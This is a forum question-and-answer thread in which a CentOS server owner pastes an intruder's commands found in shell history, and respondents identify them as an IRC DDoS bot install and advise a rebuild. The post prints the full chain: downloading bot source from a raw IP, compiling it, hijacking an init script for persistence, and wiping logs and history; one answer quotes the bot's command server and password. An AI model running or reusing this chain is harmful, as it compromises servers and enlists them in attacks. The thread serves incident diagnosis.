10

We logged remotely into our CentOS server today using Putty, and while wandering through previous commands using the up arrow, stumbled across the following:

unset HISTFILE
mkdir /usr/lib/tmp 
cd /usr/lib/tmp 
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh  >  /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &

(&&'s replaced with newlines for clarity)

I never ran these commands, EVER! How did this happen, is my server being hacked? I immediately changed my root password, but was hoping someone could make heads or tails of what's happening over here.

I see references made in the source to ddos bots, and me and my colleague are seriously concerned!

Thanks in advance!

Josef van Niekerk
  • 521
  • 4
  • 8
  • 16

6 Answers6

7

yes, you have been hacked. The hacker installed an IRC backdoor and you are connecting to this IRC server:

const  int port      = 1254; 
const char channel[] = "#test";
const char password[]= "pass";
const char server[]  = "heathen.cc";

The bot herder can execute any commands on your server. I recommend shutting down the server and reinstalling immediately. The bot has a few DDoS attack features, DNS flood, syn flood and ICMP flood. It also works on windows which is pretty cool. There is a really old spreading module to infect myDoom. This looks like some old malware.

Rook
  • 2,727
6

The answer is in any case yes, your server is being or has been compromised.

You should cut off the Internet connection to the server immediately, make a full backup (bear in mind other files may be compromised, too), and reinstall.

Also, you may want to notify the owners of the IP the bot net (or whatever this is) is run from. Here is the RIPE whois data.

Pekka
  • 2,178
1

Never allow root login via SSH.

Peter D
  • 111
0

The answer to your question is: YES

cherouvim
  • 904
0

Sounds like you've been infected with BOT_VERSION where BOT_VERSION is

#define BOT_VERSION "Linux/Unix IRC DDoS bot ver "BIN_VERSVION" by ["CRED"MZђ"CEND"]. Supported features : "FEATURES

Didn't your Linux antivirus pick this up?

ta.speot.is
  • 832
0

I probably would have sanitized the ip address of the C&C machine before posting.

jbroome
  • 141